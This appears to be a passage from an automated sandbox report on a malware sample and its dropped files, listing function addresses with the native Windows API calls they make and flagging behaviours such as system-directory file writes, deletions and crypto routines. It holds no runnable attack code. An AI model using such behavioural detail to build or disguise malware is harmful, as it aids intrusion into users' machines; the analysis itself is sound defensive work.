Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA160 ZwCreateWorkerFactory, 24_2_6ACBA160
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48966
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 24_2_6AC7B171
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACF3971 ZwOpenKeyEx, 24_2_6ACF3971
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC79100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 24_2_6AC79100
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC80100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 24_2_6AC80100
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9900 ZwOpenEvent, 24_2_6ACB9900
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9910 ZwAdjustPrivilegesToken, 24_2_6ACB9910
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC94120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 24_2_6AC94120
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD0193B ZwRaiseException,ZwTerminateProcess, 24_2_6AD0193B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9920 ZwDuplicateToken, 24_2_6ACB9920
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD4F13B ZwOpenKey,ZwCreateKey, 24_2_6AD4F13B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA130 ZwCreateWaitCompletionPacket, 24_2_6ACBA130
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48ED6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB96C0 ZwSetInformationProcess, 24_2_6ACB96C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACFA6DE ZwRaiseHardError, 24_2_6ACFA6DE
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC766D4 RtlInitUnicodeString,ZwQueryValueKey, 24_2_6AC766D4
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 24_2_6ACA9ED0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB96D0 ZwCreateKey, 24_2_6ACB96D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 24_2_6AC72ED8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD016FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 24_2_6AD016FA
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB96E0 ZwFreeVirtualMemory, 24_2_6ACB96E0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9E6F9 ZwAlpcSetInformation, 24_2_6AC9E6F9
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 24_2_6AC7B6F0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACCDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 24_2_6ACCDEF0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC73E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AC73E80
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6AD2BE9B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACADE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 24_2_6ACADE9E
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72E9F ZwCreateEvent,ZwClose, 24_2_6AC72E9F
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA690 ZwOpenKeyEx, 24_2_6ACBA690
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD43EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 24_2_6AD43EBC
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9EA0 ZwCompareSigningLevels, 24_2_6ACB9EA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD02EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD02EA3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 24_2_6AC9E6B0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6ACBB640
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBB650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6ACBB650
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9650 ZwQueryValueKey, 24_2_6ACB9650
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACABE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 24_2_6ACABE62
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAE70 ZwSetInformationWorkerFactory, 24_2_6ACBAE70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9670 ZwQueryInformationProcess, 24_2_6ACB9670
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD02E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD02E14
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 24_2_6AC7C600
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6ACB2E1C
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9E20 ZwCancelTimer2, 24_2_6ACB9E20
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD2FE3F
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD43E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 24_2_6AD43E22
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7B630 ZwWaitForKeyedEvent, 24_2_6AC7B630
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9E30 ZwCancelWaitCompletionPacket, 24_2_6ACB9E30
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD0E7D3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx, 24_2_6AD0E7D3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 24_2_6AC7F7C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB97C0 ZwTerminateProcess, 24_2_6ACB97C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACADFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 24_2_6ACADFDF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAFD0 ZwShutdownWorkerFactory, 24_2_6ACBAFD0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 24_2_6ACA37EB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC80FFD RtlInitUnicodeString,ZwQueryValueKey, 24_2_6AC80FFD
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB97F0 ZwOpenThreadTokenEx, 24_2_6ACB97F0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD00FEC ZwDuplicateObject,ZwDuplicateObject, 24_2_6AD00FEC
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD25F87 ZwUnmapViewOfSection, 24_2_6AD25F87
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACFA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 24_2_6ACFA7AC
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 24_2_6ACB3FA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB97A0 ZwUnmapViewOfSection, 24_2_6ACB97A0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7A7B0 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx, 24_2_6AC7A7B0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 24_2_6ACA174B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 24_2_6ACB0F48
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACFA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 24_2_6ACFA746
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9740 ZwOpenThreadToken, 24_2_6ACB9740
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9750 ZwQueryInformationThread, 24_2_6ACB9750
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 24_2_6AD2CF70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBAF60 ZwSetTimer2, 24_2_6ACBAF60
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9F70 ZwCreateIoCompletion, 24_2_6ACB9F70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9770 ZwSetInformationFile, 24_2_6ACB9770
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD0176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 24_2_6AD0176C
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48F6A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA9702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 24_2_6ACA9702
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9710 ZwQueryInformationToken, 24_2_6ACB9710
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2CF30 ZwAlertThreadByThreadId, 24_2_6AD2CF30
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 24_2_6ACAE730
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9730 ZwQueryVirtualMemory, 24_2_6ACB9730
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48CD6
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC72CDB RtlFreeHeap,ZwClose,ZwSetEvent, 24_2_6AC72CDB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC7F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6AC7F4E3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD314FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD314FB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD264FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 24_2_6AD264FB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01CE4 ZwQueryInformationProcess, 24_2_6AD01CE4
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6AD34496
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA480 ZwInitializeNlsFiles, 24_2_6ACBA480
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACF3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 24_2_6ACF3C93
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD49CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD49CB3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 24_2_6ACB0CA1
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD44CAB ZwTraceControl, 24_2_6AD44CAB
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD0C450 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap, 24_2_6AD0C450
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9C40 ZwAllocateVirtualMemoryEx, 24_2_6ACB9C40
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC75450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 24_2_6AC75450
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01C49 ZwQueryInformationProcess, 24_2_6AD01C49
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48C75
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6AC9746D
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01C76 ZwQueryInformationProcess, 24_2_6AD01C76
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 24_2_6ACAAC7B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD23C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 24_2_6AD23C60
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 24_2_6ACB5C70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9C70 ZwAlpcConnectPort, 24_2_6ACB9C70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD48C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6AD48C14
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD31411 ZwTraceEvent, 24_2_6AD31411
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB0413 ZwUnmapViewOfSection, 24_2_6ACB0413
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACBA420 ZwGetNlsSectionPtr, 24_2_6ACBA420
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9FC39 ZwAssociateWaitCompletionPacket, 24_2_6AC9FC39
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC74DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 24_2_6AC74DC0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB95C0 ZwSetEvent, 24_2_6ACB95C0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9EDC4 ZwCancelWaitCompletionPacket, 24_2_6AC9EDC4
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC745D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 24_2_6AC745D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB95D0 ZwClose, 24_2_6ACB95D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6AD2BDFA
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9DE0 ZwAssociateWaitCompletionPacket, 24_2_6ACB9DE0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC795F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 24_2_6AC795F0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB95F0 ZwQueryInformationFile, 24_2_6ACB95F0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC8DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 24_2_6AC8DD80
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD31582 ZwTraceEvent, 24_2_6AD31582
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC73591 ZwSetInformationFile, 24_2_6AC73591
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC765A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 24_2_6AC765A0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9DA0 ZwAlpcSendWaitReceivePort, 24_2_6ACB9DA0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB95B0 ZwSetInformationThread, 24_2_6ACB95B0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACB9DB0 ZwAlpcSetInformation, 24_2_6ACB9DB0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA0548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 24_2_6ACA0548
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACF3540 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess, 24_2_6ACF3540
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01D43 ZwQueryInformationThread, 24_2_6AD01D43
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD01570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 24_2_6AD01570
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD36D61 ZwAllocateVirtualMemoryEx, 24_2_6AD36D61
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe File deleted: C:\Windows\System\xxx1.bak
Detected potential crypto function
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E146E30 1_2_6E146E30
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F2EF7 1_2_6E1F2EF7
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152F70 1_2_6E152F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E67E2 1_2_6E1E67E2
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4496 1_2_6E1E4496
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E120D20 1_2_6E120D20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F1D55 1_2_6E1F1D55
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1535D0 1_2_6E1535D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFA2B 1_2_6E1DFA2B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F32A9 1_2_6E1F32A9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EE2C5 1_2_6E1EE2C5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14AB40 1_2_6E14AB40
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1CEB8A 1_2_6E1CEB8A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15EBB0 1_2_6E15EBB0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15ABD8 1_2_6E15ABD8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D23E3 1_2_6E1D23E3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E178BE8 1_2_6E178BE8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126800 1_2_6E126800
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1002 1_2_6E1E1002
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A830 1_2_6E14A830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E158840 1_2_6E158840
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E13B090 1_2_6E13B090
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1499BF 1_2_6E1499BF
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 18_2_00E60CE8 18_2_00E60CE8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD3E2C5 24_2_6AD3E2C5
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34AEF 24_2_6AD34AEF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD432A9 24_2_6AD432A9
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD2FA2B 24_2_6AD2FA2B
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAABD8 24_2_6ACAABD8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACC8BE8 24_2_6ACC8BE8
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD223E3 24_2_6AD223E3
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD1EB8A 24_2_6AD1EB8A
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACAEBB0 24_2_6ACAEBB0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9AB40 24_2_6AC9AB40
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A309 24_2_6AC9A309
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC8B090 24_2_6AC8B090
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA8840 24_2_6ACA8840
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC76800 24_2_6AC76800
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD31002 24_2_6AD31002
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC9A830 24_2_6AC9A830
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC999BF 24_2_6AC999BF
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC94120 24_2_6AC94120
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC96E30 24_2_6AC96E30
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD367E2 24_2_6AD367E2
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA2F70 24_2_6ACA2F70
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AD34496 24_2_6AD34496
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6ACA35D0 24_2_6ACA35D0
Source: C:\Users\user\AppData\Roaming\webgfvd Code function: 24_2_6AC70D20 24_2_6AC70D20
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064DF260 25_2_064DF260
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064D0040 25_2_064D0040
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064DD0C1 25_2_064DD0C1
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064DD0E8 25_2_064DD0E8
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064D2840 25_2_064D2840
Source: C:\Users\user\AppData\Local\Temp\2531.exe Code function: 25_2_064D2830 25_2_064D2830
Found potential string decryption / allocating functions
